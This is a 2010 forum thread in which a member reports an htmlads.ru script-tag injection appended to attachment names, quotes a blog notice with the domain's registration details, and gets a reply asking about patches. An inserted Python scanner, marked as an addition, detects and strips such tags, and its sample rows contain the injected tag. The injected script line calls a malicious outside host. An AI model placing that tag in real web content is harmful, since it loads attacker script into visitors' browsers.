Injection attack?
Mutts
Member

Posts: 14

Posted 2010-01-08 5:19 AM
Subject: Injection attack?


Since the DNS problem.. & we switched to metropower.org.uk.. it has been spotted that attachments in the forum before that date now read "Chillin!.JPG<script src=http://www.htmlads.ru/ads.js></script> (65KB - 9 downloads)" for example, instead of just "Chillin!.jpg (65KB - 9 downloads)".

After some quick research this appears to be referred to as an injection attack

(source - http://www.dynamoo.com/blog/2009_10_0...)

htmlads.ru injection attack

Another injection attack following on from this one, htmlads.js looks like it is being injected into IIS 6.0 servers. In this case, the string to look for in your logs is htmlads.js/ads.js, which is worth checking for and blocking if you can.


For the records, the domain registration details are:

domain: HTMLADS.RU
type: CORPORATE
nserver: ns1.htmlads.ru. 75.34.216.140
nserver: ns2.htmlads.ru. 216.119.45.147
nserver: ns3.htmlads.ru. 72.48.193.152
nserver: ns4.htmlads.ru. 71.108.37.140
state: REGISTERED, DELEGATED, UNVERIFIED
person: Private person
phone: +7 496 4047474
e-mail: tau@8081.ru
registrar: REGRU-REG-RIPN
created: 2009.10.05
paid-till: 2010.10.05
source: TC-RIPN

Labels: IIS, Russia, Viruses

*************************
 
Is this something on your host server that needs clearing or is it
something within the system that we need to clear from our end?

Cheers, Mutts.



Edited by Mutts 2010-01-08 5:35 AM
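
A way to find and strip the appended tag described in the post above, as an added example that is not part of the original thread or the forum software. It assumes the affected text fields have been exported from the forum database as (id, column, value) rows; the row layout, column name and rows 2 and 3 are constructed for illustration.

```python
import re
from collections import Counter
from urllib.parse import urlparse

# <script src=...></script>, URL quoted or bare, any letter case.
SCRIPT_TAG = re.compile(
    r"<script\b[^>]*\bsrc\s*=\s*[\"']?([^\"'\s>]+)[\"']?[^>]*>\s*</script\s*>",
    re.IGNORECASE,
)

def scan_value(value, allowed_hosts=frozenset()):
    """Return (cleaned_value, hosts) for one stored text field.

    Tags whose src host is in allowed_hosts are left in place; every other
    tag is removed and its host (or raw src, if relative) is reported.
    """
    hosts = []

    def strip(match):
        src = match.group(1)
        host = (urlparse(src).hostname or "").lower()
        if host and host in allowed_hosts:
            return match.group(0)
        hosts.append(host or src)
        return ""

    return SCRIPT_TAG.sub(strip, value), hosts

def scan_rows(rows, allowed_hosts=frozenset()):
    """rows: iterable of (row_id, column, value). One finding per tainted row."""
    findings = []
    for row_id, column, value in rows:
        cleaned, hosts = scan_value(value, allowed_hosts)
        if hosts:
            findings.append({"id": row_id, "column": column,
                             "hosts": hosts, "cleaned": cleaned})
    return findings

# Constructed sample rows; row 1 is the attachment name quoted in the post.
SAMPLE_ROWS = [
    (1, "filename", "Chillin!.JPG<script src=http://www.htmlads.ru/ads.js></script>"),
    (2, "filename", "holiday.jpg"),
    (3, "filename", 'map.png<SCRIPT SRC="http://www.htmlads.ru/ads.js"></SCRIPT>'),
]

if __name__ == "__main__":
    found = scan_rows(SAMPLE_ROWS)
    print(Counter(h for f in found for h in f["hosts"]))
    for f in found:
        print(f["id"], f["column"], "->", f["cleaned"])
```

Removing the tags cleans the stored data only; the route by which they reached the database still has to be found and closed.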
 
Zan
Ezboxx Founder

Posts: 2707
Posted 2010-01-09 2:27 AM
Subject: RE: Injection attack?


Have you applied the latest patches?

There have been no reports of SQL injection since we released the last set of patches a year or so ago.

 
Running MegaBBS ASP Forum Software v2.0
© 2003 PD9 Software
And Ezboxx Portal System Beta v 0.7.6